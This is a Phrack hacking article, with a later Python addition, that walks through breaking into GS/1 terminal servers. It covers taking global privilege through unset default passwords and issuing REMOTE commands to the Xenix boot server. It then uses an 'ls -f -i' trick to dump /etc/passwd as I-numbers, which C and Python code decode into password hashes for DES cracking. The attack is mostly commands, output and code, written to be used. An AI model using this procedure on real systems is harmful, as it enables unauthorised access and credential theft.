==Phrack Magazine==
Volume Five, Issue Forty-Six, File 17 of 28
****************************************************************************
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
[<> <>]
[<> ----+++===::: GETTiN' D0wN 'N D1RTy wiT Da GS/1 :::===+++---- <>]
[<> <>]
[<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>]
[<> <>]
[<> Brought to you by: <>]
[<> [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT <>]
[<> <>]
[<> Story line: Maldoror -n- [)r. [)elam <>]
[<> Main Characters: Menacing Maldoror & The Evil [)r. [)elam <>]
[<> Unix Technical Expertise: Wunder-Boy [)elam <>]
[<> Sysco Technishun: Marvelous Maldoror <>]
[<> <>]
[<> Look for other fine [)elamo Labz and ChURcH oF ThE <>]
[<> Non-CoNForMisT products already on the market such as <>]
[<> DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's <>]
[<> Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet <>]
[<> skanner for Telix), PREFIX (Maldoror's telephone prefix <>]
[<> identification program), and various other programs and <>]
[<> philez written by Dr. Delam, Maldoror, Green Paradox, <>]
[<> El Penga, Hellpop, and other certified DLI and CNC members. <>]
[<> <>]
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
Index
========================================
1. Finding and identifying a GS/1
2. Getting help
3. Gaining top privilege access
4. Finding the boot server
5. Connecting to the boot server
6. Getting the boot server password file
7. Other avenues
----------------------------------------------------------------------------
Here's hacking a GS/1 made EZ (for the sophisticated hacker). It is
advisable to fill your stein with Sysco and pay close attention... if
Sysco is not available in your area, Hacker Pschorr beer will work
almost as well... (especially the Oktoberfest variety)
What is a GS/1?
---------------
A GS/1 allows a user to connect to various other computers... in other
words, it's a terminal server, in the same class as a DECserver or a Xyplex.
So why hack it?
---------------
Cuz itz there... and plus you kan access all sortz of net stuph fer
phree. (QSD @ 208057040540 is lame and if you connect to it, you're
wasting the GS/1.. the French fone police will fly over to your country
and hunt you down like a wild pack of dogs, then hang you by your own
twisted pair.)
What to do:
-----------
+--------------------------------------+
+ #1. Finding and identifying a GS/1 +
+--------------------------------------+
Find a GS/1 .. they're EZ to identify.. they usually have a prompt of
GS/1, though the prompt can be set to whatever you want it to be. A
few years ago there were quite a number of GS/1's lying around on
Tymnet and Telenet... you can still find a few if you scan the right
DNIC's. (If you don't know what the hell I'm talking about, look at
some old Phracks and LOD tech. journals.)
The prompt will look similar to this:
(!2) GS/1>
(The (!2) refers to the port you are on)
+--------------------+
+ #2. Getting help +
+--------------------+
First try typing a '?' to display help items.
A help listing looks like this:
> (!2) GS/1>?
> Connect [,] [ ECM ] [ Q ]
> DO
> Echo
> Listen
> Pause []
> PIng [ timeout ]
> SET = ...
> SHow ...
At higher privileges such as global (mentioned next) the help will
look like this (note the difference in the GS/1 prompt with a # sign):
> (!2) GS/1# ?
> BRoadcast ( )
> Connect ( ) [,] [ ECM ] [ Q ]
> DEFine = ( )
> DisConnect ( ) []
> DO ( )
> Echo
> Listen ( )
> Pause []
> PIng [ timeout ]
> ReaD ( )
> REMOTE
> ROtary ( ) ! [+|-]= ![-!] , ...
> SAve ( )
> SET ( ) = ...
> SETDefault ( ) [ = ] ...
> SHow ( ) ...
> UNDefine ( )
> UNSave ( )
> ZeroMacros ( )
> ZeroStats ( )
Additional commands under global privilege are: BRoadcast, DEFine,
DisConnect, ReaD, REMOTE, ROtary, UNDefine, UNSave, ZeroMacros,
ZeroStats, and a few extra options under the normal user commands.
If you need in-depth help for any of the commands, you can again use the
'?' in the following fashion:
> (!2) GS/1>sho ?
> SHow ADDRess
> SHow ClearingHouseNames [ [ @ [@ ] ] ]
> SHow DefaultParameters [ ...]
> SHow GLobalPARameters
> SHow NetMAP [ Short | Long ]
> SHow PARAmeterS [ ...]
> SHow ...
> SHow SESsions [ P ]
> SHow VERSion
> (!2) GS/1>sh add?
> SHow ADDRess
> (!2) GS/1>sh add
> ADDRess = &000023B5%07000201E1D7!2
"sh add" displays your own network, address and port number, separated by
'&', '%' and '!' respectively. In the example above:
The network is 000023B5
The address is 07000201E1D7
The port number is 2
+------------------------------------+
+ #3. Gaining top privilege access +
+------------------------------------+
Figure out the global password.
Do a "set priv=global" command.
Note:
----
There are 3 states to set priv to: user, local, and global. Global is
the state with the most privilege. When you attain global privilege,
your prompt will change to have a '#' sign at the end of it.. this means
you have top privilege (similar to *nix's super user prompt).
The GS/1 will prompt you for a password. The default on GS/1's is to
have no password set at all... the GS/1 will still prompt you for one,
but if the password was never set, anything you enter at this point
gets you in.
+-------------------------------+
+ #4. Finding the boot server +
+-------------------------------+
Figure out the boot server address available from this GS/1 ..
The boot server is what lies under the GS/1 (the machine named by its
BootServerAddress parameter). We've found that the boot server actually
runs the Xenix operating system.. (which is of course nice phamiliar
territory) It's debatable whether every GS/1 boots from a Xenix box or
not, as we have yet to contact the company. (We may put out a 2nd file
going into more detail.)
Do a "sh b" or "sh global" as shown in the following examples:
> (!2) GS/1# sh b
> BAud = 9600 BootServerAddress = &00000000%070002017781
> BReakAction = ( FlushVC, InBand ) BReakChar = Disabled
> BSDelay = None BUffersize = 82
> (!2) GS/1# sh global
> ...............................Global Parameters............................
> DATE = Wed Jun 22 21:16:45 1994 TimeZone = 480 minutes
> DaylightSavingsTime = 0 minutes LogoffStr = "L8r laM3r"
> WelcomeString = "Welcome to your haqued server (!2), Connected to "
> DOmain = "thelabz" Organization = "delam0"
> PROmpt = "GS/1>" NMPrompt = "GS/1# "
> LocalPassWord = "" GlobalPassWord = "haque-me"
> NetMapBroadcast = ON MacType = EtherNET
> CONNectAudit = ON ERRorAudit = ON
> AUditServerAddress = &000031A4%07000200A3D4
> AUditTrailType = Local
> BootServerAddress = &00000000%070002017781
Side note: the GlobalPassWord is "haque-me" whereas the LocalPassWord is ""
... these are the actual passwords that need to be entered (or in the case
of the LocalPassWord, "" means any string is accepted). You'll only be able
to "sh global" after a successful "set priv=global" (section 3), so it only
confirms the password you already got in with.. what it does give you is
the BootServerAddress.
Now that you have the boot server address, the next step is enabling
communication to the boot server.
+-------------------------------------+
+ #5. Connecting to the boot server +
+-------------------------------------+
Do a REMOTE <address>, where <address> is the address of the machine you
want to issue remote commands to (below, the %station part of the
BootServerAddress shown by "sh b" is used).
> (!2) GS/1# REMOTE %070002017781
> (!2) Remote: ?
> BInd [-f ] [-l ] []
> BRoadcast ( ) ""
> CoPyfile [:] [:][]
> LiSt [ -ls1CR ] [ ...]
> MoVe
> NAme = [,]...
> Ping [timeout]
> ReMove ...
> SET [( )] = ...
> SETDefault = ...
> SHow
> UNBind
> UNDefine
> UNName
> ZeroStats
> (to leave remote mode)
Your prompt changes from "(!2) GS/1# " to "(!2) Remote: "... this means
you will be issuing commands to whatever remote machine you specified
by the REMOTE command.
Notice for this case, the boot server's address was used.
When you get the "Remote:" prompt, you can issue commands that will be
executed on the remote machine. Try doing a '?' to see if it's another
GS/1.. if not, try doing 'ls' to see if you have a *nix type machine.
Also notice that the help commands on the remote are not the same as
those for the GS/1 (though, if you establish a remote link with another
GS/1 they will be the same).
> (!2) Remote: ls -l
> total 1174
> drwxrwxrwx 2 ncs ncs 160 Aug 17 1989 AC
> drwxrwxrwx 2 ncs ncs 5920 Jun 5 00:00 AUDIT_TRAIL
> drwxrwxrwx 2 ncs ncs 96 Jun 5 01:00 BACKUP
> drwxrwxrwx 2 ncs ncs 240 Jun 4 04:42 BIN
> drwxrwxrwx 2 ncs ncs 192 Jun 4 04:13 CONFIGS
> drwxrwxrwx 2 ncs ncs 64 Aug 17 1989 DUMP
> drwxrwxrwx 2 ncs ncs 80 Aug 17 1989 ETC
> drwxrwxrwx 2 ncs ncs 160 Jun 4 04:13 GLOBALS
> -rw-r--r-- 1 ncs ncs 228 Jun 5 00:59 btdata
> -rw-r--r-- 1 ncs ncs 8192 Jun 8 1993 chnames.dir
> -rw-r--r-- 1 ncs ncs 11264 Jun 1 13:41 chnames.pag
> drwxrwxrwx 2 ncs ncs 48 Jun 5 00:00 dev
> drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
> -rw-rw-rw- 1 ncs ncs 557056 Mar 23 1992 macros
> -rw-r--r-- 1 ncs ncs 512 Oct 22 1993 passwd
Look familiar?? If not, go to the nearest convenience store and buy a
12 pack of the cheapest beer you can find.. leave your computer
connected so you hurry back, and slam eight or nine cold onez... then
look at the screen again.
You're basically doing a Remote Procedure Call for ls to your Xenix boot
server.
Notice at this point that the "passwd" is not owned by root. This is
because this is not the system password file, and you are not in the
"/etc" directory... (yet)
There are a couple of problems:
> (!2) Remote: cat
> Invalid REMOTE command
>
> (!2) Remote: cd /etc
> Invalid REMOTE command
You cannot view files and you cannot change directories: only what's in
the Remote help listing exists. But LiSt is handed to the Xenix box as its
own ls, with the full option set (see the usage line it prints in section
6), and that is what the rest of this file leans on.
To solve the "cd" problem do the following:
> (!2) Remote: ls -l ..
> total 26
> drwxrwxrwx 12 root root 352 Jun 5 00:59 NCS
> drwxr-xr-x 2 bin bin 112 Aug 17 1989 adm
> drwxrwx--- 2 sysinfo sysinfo 48 Aug 17 1989 backup
> drwxr-xr-x 2 bin bin 1552 Aug 17 1989 bin
> drwxr-xr-x 20 bin bin 720 Aug 17 1989 lib
> drwxrwxrwx 6 ncs ncs 224 Aug 17 1989 ncs
> drwxr-xr-x 2 bin bin 32 Aug 17 1989 preserve
> drwxr-xr-x 2 bin bin 64 Aug 17 1989 pub
> drwxr-xr-x 7 bin bin 144 Aug 17 1989 spool
> drwxr-xr-x 9 bin bin 144 Aug 17 1989 sys
> drwxr-x--- 2 root root 48 Aug 17 1989 sysadm
> drwxrwxrwx 2 bin bin 48 Jun 5 01:00 tmp
>
> (!2) Remote: ls -l ../..
> total 1402
> -rw-r--r-- 1 root root 1605 Aug 17 1989 .login
> -r--r--r-- 1 ncs ncs 1605 Aug 28 1990 .login.ncs
> -rw-r--r-- 1 root root 653 Aug 17 1989 .logout
> -r--r--r-- 1 ncs ncs 653 Aug 28 1990 .logout.ncs
> -rw------- 1 root root 427 Aug 17 1989 .profile
> drwxr-xr-x 2 bin bin 2048 Aug 17 1989 bin
> -r-------- 1 bin bin 25526 May 4 1989 boot
> drwxr-xr-x 6 bin bin 3776 Aug 17 1989 dev
> -r-------- 1 bin bin 577 Nov 3 1987 dos
> drwxr-xr-x 5 bin bin 1904 Jun 2 12:40 etc
> drwxr-xr-x 2 bin bin 64 Aug 17 1989 lib
> drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
> drwxr-xr-x 2 bin bin 32 Aug 17 1989 mnt
> drwxrwxrwx 2 bin bin 512 Jun 5 01:20 tmp
> drwxr-xr-x 14 bin bin 224 Aug 17 1989 usr
> -rw-r--r-- 1 bin bin 373107 Aug 17 1989 xenix
> -rw-r--r-- 1 root root 287702 Aug 17 1989 xenix.old
Your brain should now experience deja vu.. you just found the
root directory. (for the non-*nix, lam0-hacker, the root directory
has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.)
Now you can get to /etc/passwd as follows:
> (!2) Remote: ls -l ../../etc
> total 1954
> -rwx--x--x 1 bin bin 7110 May 8 1989 accton
> -rwx------ 1 bin bin 1943 May 8 1989 asktime
> -rwx------ 1 bin bin 31756 May 8 1989 badtrk
> -rw-rw-rw- 1 root root 1200 Apr 24 12:40 bootlog
> -rwx--x--x 1 bin bin 24726 May 8 1989 brand
> -rw-r--r-- 1 bin bin 17 Aug 17 1989 checklist
> -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.last
> -rw-r--r-- 1 ncs ncs 17 Aug 28 1990 checklist.ncs
> -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.orig
> -rwx------ 1 bin bin 2857 May 8 1989 chsh
> -rwx------ 1 bin bin 7550 May 8 1989 clri
> -rwx------ 1 bin bin 8034 May 8 1989 cmos
> -rwxr-xr-x 1 root bin 31090 Aug 28 1990 cron
> -rw-r--r-- 1 bin bin 369 May 8 1989 cshrc
> ...... etc.
> -rw-r--r-- 1 root root 465 Mar 5 1991 passwd
Yeah, now what?!
You've found the /etc/passwd file, but you don't have "cat" to type the
file out. Now you're stuck... so drink a half a bottle of Sysco per
person. (We did... and as you'll see, Sysco is the drink of manly hackers
like us... make sure it's the big bottle kind not those girly small
onez.)
+---------------------------------------------+
+ #6. Getting the boot server password file +
+---------------------------------------------+
There is one way to get around the cat problem (no itz n0t puttin
catnip laced with somethin U made frum a phile on yer doorstep)
It's done using ls. On this Xenix system, the directory structure is
the old Unix format: A 16 byte record comprised of a 2 byte I-number
and a 14 byte character field.
Note about directory structure for the inquisitive hacker:
In a directory record there is a 14 byte string containing the file
name, and the 2 byte I-number (a 16 bit integer, stored low byte first
on this 8086-class Xenix box) which is a number that is an (I)ndex
pointer to the I-node. The I-node then contains the information about
where the file's data is actually kept (similar to how a FAT table works
on an IBM PC, yet a different concept as it has indirect index blocks
etc. that I won't get into) and what permissions are set for the file.
Be warned that in newer *nix implementations, file names can be more
than 14 characters and the directory structure will be a bit different
than discussed.
The "ls" command has an option that allows you to tell it "this *file* is
a *directory*.. so show me what's in the directory" (the -f option), and
another (-i) that prints the I-number in front of each name. Newer *nix
systems won't like this trick because of the new directory structure
(their ls no longer reads raw 16 byte records).
> (!2) Remote: ls -?
> ls: illegal option --?
> usage: -1ACFRabcdfgilmnopqrstux [files]
>
> (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd
> 28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
> 25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
> 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
> 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
> 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
> 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
> 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
> 26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
> 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
> 29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
> 29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
> 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFnHnL
> 22327 xcU:100:100:NC 8275 operator:/usr/
>
> (!2) Remote:
> (!2) GS/1#
Wow, kewl. Now that you have a bunch-o-shit on your screen, you have
to make some sense out of it.
The password file is almost legible, but each I-number still needs to be
converted back into the two ASCII characters it encodes. This can be
accomplished in a variety of ways... the easiest is to write a program
like the following in C:
On a PC the following code should work:
#include <stdio.h>

/* On a 16-bit DOS compiler int is 2 bytes, so the union overlays the
   I-number with exactly its two bytes. The 8086 is little-endian, so
   c[0] is the low byte and is the first character of the record.
   (A little-endian host with a 4 byte int still prints the right two
   characters for I-numbers below 65536.) Stops at EOF or bad input. */
int main(void)
{
union {
int i;
char c[2];
} x;
printf("Enter I-Number: ");
while (scanf("%d", &x.i) == 1) {
printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]);
printf("Enter I-Number: ");
}
return 0;
}
On a *nix based system the following code will work (depending on
word size and byte arrangement):
#include <stdio.h>

/* For a big-endian host (68k, SPARC): a 2 byte short stores its high
   byte first, so the record's first character is c[1], then c[0].
   On a little-endian host swap them back to c[0], c[1]. */
int main(void)
{
union {
short int i;
char c[2];
} x;
printf("Enter I-Number: ");
while (scanf("%hd", &x.i) == 1) {
printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]);
printf("Enter I-Number: ");
}
return 0;
}
When you have translated the I-numbers you can substitute the ASCII
values by hand (or write a d0p3 program to do it for you):
28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
28530 = [r][o] 30580 = [t][w] 14962 = [r][:]
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
25697 = [a][d] 14929 = [Q][:] 28265 = [i][n]
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
29487 = [/][s] 29283 = [c][r] 17210 = [:][C]
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
28704 = [ ][p] 14895 = [/][:] 13114 = [:][3]
periodic tasks:/:?bin:NOLOGIN:3:3:System file a
28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
28004 = [d][m] 29962 = [^J][u] 25697 = [a][d]
dministration:/:
uucp::4:4:Uucp administration:/
(^J is a newline, byte 0x0A.. the low byte of 29962 = 0x750A. It landed
in the I-number instead of the name field, so ls never got to turn it
into a '?', and the line break has to be made here by hand.)
29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
29557 = [u][s] 27746 = [b][l] 28771 = [c][p]
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
20300 = [L][O] 25185 = [a][b] 26990 = [n][i]
LOGIN:6:6:Assignable device administration:/:?sy
26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
26995 = [s][i] 12602 = [:][1] 29811 = [s][t]
sinfo:NOLOGIN:10:10:Access to system information
12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
12090 = [:][/] 18759 = [G][I] 25710 = [n][d]
:/:?network:NOLOGIN:12:12:Mail and Network admin
29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
29545 = [i][s] 28528 = [p][o] 20302 = [N][O]
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
29806 = [n][t] 29545 = [i][s] 28528 = [p][o]
nt spooler administration:/usr/spool/lp:?dos:NOL
18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFnHnL
18255 = [O][G] 8307 = [s][ ] 12090 = [:][/]
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL
22327 xcU:100:100:NC 8275 operator:/usr/
22327 = [7][W] 8275 = [S][ ]
7WxcU:100:100:NCS operator:/usr
The resulting file will look like the following:
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
periodic tasks:/:?bin:NOLOGIN:3:3:System file a
dministration:/:
uucp::4:4:Uucp administration:/
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
LOGIN:6:6:Assignable device administration:/:?sy
sinfo:NOLOGIN:10:10:Access to system information
:/:?network:NOLOGIN:12:12:Mail and Network admin
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
nt spooler administration:/usr/spool/lp:?dos:NOL
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL
7WxcU:100:100:NCS operator:/usr
Because the ls command cannot display "non-printable" characters such
as the newline, it will replace them with a '?' character... delete the
'?' characters and divide by line at these locations (the one newline
that fell inside an I-number, 29962, was already split above). A literal
'?' can't occur in a crypt(3) hash, only in the comment field, so this is
safe here. When you finish doing that, you'll have a standard /etc/passwd
file:
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh
sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh
cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/:
bin:NOLOGIN:3:3:System file administration:/:
uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico
asg:NOLOGIN:6:6:Assignable device administration:/:
sysinfo:NOLOGIN:10:10:Access to system information:/:
network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet:
lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp:
dos:NOLOGIN:16:10:Access to Dos devices:/:
ncs:yYNFnHnL7WxcU:100:100:NCS operator:/usr
Once you've assembled your password file in a standard ASCII form,
you'll of course want to crack it with one of the many available DES
cracking programs. Only root, sysadm and ncs actually carry 13 character
crypt(3) hashes.. "NOLOGIN" is not a valid hash, so those accounts can't
be logged into at all, and uucp has an empty password field, so it needs
no password (though its "shell" is /usr/lib/uucp/uucico, not a real
shell).
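The I-number conversion and the '?'/newline reassembly above, done in one
go as an added example (Python, not code from the original article): each
I-number is packed back into its two bytes (low byte first, as on the 8086
Xenix box; a byteorder switch covers the big-endian case the *nix C program
handles), the 16 byte records are concatenated, '?' is turned back into a
newline and the result is split into passwd lines. The CAPTURE table is
transcribed from the ls listing in this section with the fixed-width 14
character name fields restored, since the text as printed here has
collapsed runs of spaces; the ncs hash follows the raw listing. classify()
is an extra check not in the article: it tags which password fields are
real crypt(3) hashes worth feeding to a DES cracker.

```python
"""Rebuild a file dumped with the old 'ls -f' directory trick (added example)."""
import re
import struct

# Constructed sample input: the article's ls listing of ../../etc/passwd,
# transcribed as (I-number, 14-character name field) pairs with the
# fixed-width fields restored (the text as printed has collapsed runs of
# spaces, e.g. " spooler admin" and "Uucp " really carry those blanks).
CAPTURE = [
    (28530, "ot:BJlx/e8APHe"), (30580, ":0:0:Super use"), (14962, "/:/bin/csh?sys"),
    (25697, "m:X/haSqFDwHz1"), (14929, "0:0:System Adm"), (28265, "istration:/usr"),
    (29487, "ysadm:/bin/sh?"), (29283, "on:NOLOGIN:1:1"), (17210, "ron daemon for"),
    (28704, "eriodic tasks:"), (14895, "?bin:NOLOGIN:3"), (13114, ":System file a"),
    (28004, "inistration:/:"), (29962, "ucp::4:4:Uucp "), (25697, "ministration:/"),
    (29557, "r/spool/uucppu"), (27746, "ic:/usr/lib/uu"), (28771, "/uucico?asg:NO"),
    (20300, "GIN:6:6:Assign"), (25185, "le device admi"), (26990, "stration:/:?sy"),
    (26995, "nfo:NOLOGIN:10"), (12602, "0:Access to sy"), (29811, "em information"),
    (12090, ":?network:NOLO"), (18759, "N:12:12:Mail a"), (25710, " Network admin"),
    (29545, "tration:/usr/s"), (28528, "ol/micnet:?lp:"), (20302, "LOGIN:14:3:Pri"),
    (29806, " spooler admin"), (29545, "tration:/usr/s"), (28528, "ol/lp:?dos:NOL"),
    (18255, "IN:16:10:Acces"), (8307, "to Dos devices"), (12090, ":?ncs:yYNFnHnL"),
    (22327, "xcU:100:100:NC"), (8275, "operator:/usr/"),
]

# crypt(3) DES output: 2 salt + 11 hash characters, all from [./0-9A-Za-z]
DES_HASH = re.compile(r"^[./0-9A-Za-z]{13}$")


def record_bytes(inum, name, byteorder="little"):
    """One 16-byte V7 directory record: 2-byte I-number, 14-byte name field.

    ls printed the I-number as a decimal integer; on the 8086 Xenix box it
    is a little-endian short, so its low byte is the first byte of the
    record (28530 = 0x6F72 -> 'r', 'o'). On a big-endian host the two
    bytes come out swapped, which is what the *nix C program accounts for.
    Names shorter than 14 bytes are NUL-padded on disk and ls stops at the
    NUL, so a short field is padded back here.
    """
    if len(name) > 14:
        raise ValueError("name field longer than 14 bytes: %r" % name)
    fmt = "<H" if byteorder == "little" else ">H"
    return struct.pack(fmt, inum) + name.encode("latin-1").ljust(14, b"\0")


def rebuild(entries, byteorder="little"):
    """Concatenate the records back into the original file contents."""
    return b"".join(record_bytes(i, n, byteorder) for i, n in entries)


def to_lines(data):
    """Split the rebuilt file into its lines.

    ls shows a non-printable byte in the name field as '?'; in this dump
    every '?' is a newline (a DES hash never contains '?', only the comment
    field could). A newline that fell into the 2-byte I-number comes back
    as a real 0x0A from record_bytes and needs no substitution.
    """
    text = data.rstrip(b"\0").decode("latin-1")
    return text.replace("?", "\n").split("\n")


def classify(lines):
    """Tag each account by what its password field is worth to a DES cracker:
    'des' (13-character crypt(3) hash), 'empty' (no password at all) or
    'locked' (anything else, such as NOLOGIN)."""
    result = []
    for line in lines:
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw = fields[0], fields[1]
        if DES_HASH.match(pw):
            kind = "des"
        elif pw == "":
            kind = "empty"
        else:
            kind = "locked"
        result.append((user, kind))
    return result


if __name__ == "__main__":
    passwd_lines = to_lines(rebuild(CAPTURE))
    print("\n".join(passwd_lines))
    print()
    for user, kind in classify(passwd_lines):
        print("%-8s %s" % (user, kind))
```

Run it as-is and the eleven passwd lines from the listing come out, with
root, sysadm and ncs tagged as the only crackable entries and uucp flagged
as having no password at all. For a dump taken from a big-endian box, call
rebuild(entries, "big").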
+---------------------+
+ #7: Other Avenues +
+---------------------+
Find out what else you can play with by first finding what networks are
available other than your own, and second, find out what machines are on
your network:
>(!2) GS/1# sh att
> Attached Networks
>&000023B5
>(!2) GS/1# sh nmap l
> NETWORK &000023B5 MAP
>
> 1-%070002017781 SW/AT-NCS 3.0.2 2-%070002A049C5 SW/NB-BR-3.1.1.1
> 3-%0700020269A7 SW/200-A/BSC/SDL22000 4-%07000201C089 SW/200-A/BSC/SDL22020
> 5-%070002023644 SW/200-A/BSC/SDL22020 6-%0700020138B2 SW/AT-NCS 2.1.1
> 7-%070002010855 SW/100-A/BSC 20060 8-%070002018BA2 SW/20-XNS-X.25 .0.2
> .... etc.
The boot server address, from previous examples, is number 1
which contains a description "SW/AT-NCS". Examining the rest of the
list, number 6 has the same description (an older version, 2.1.1).
System 6 may be just another address for the boot server or it may be a
different Xenix box... but it should be Xenix whatever it is.
We have refrained from covering the typical GS/1 information that has been
published by others; and instead, covered newer concepts in GS/1 hacking.
This phile is not a complete guide to GS/1 hacking; but expect successive
publications on the topic.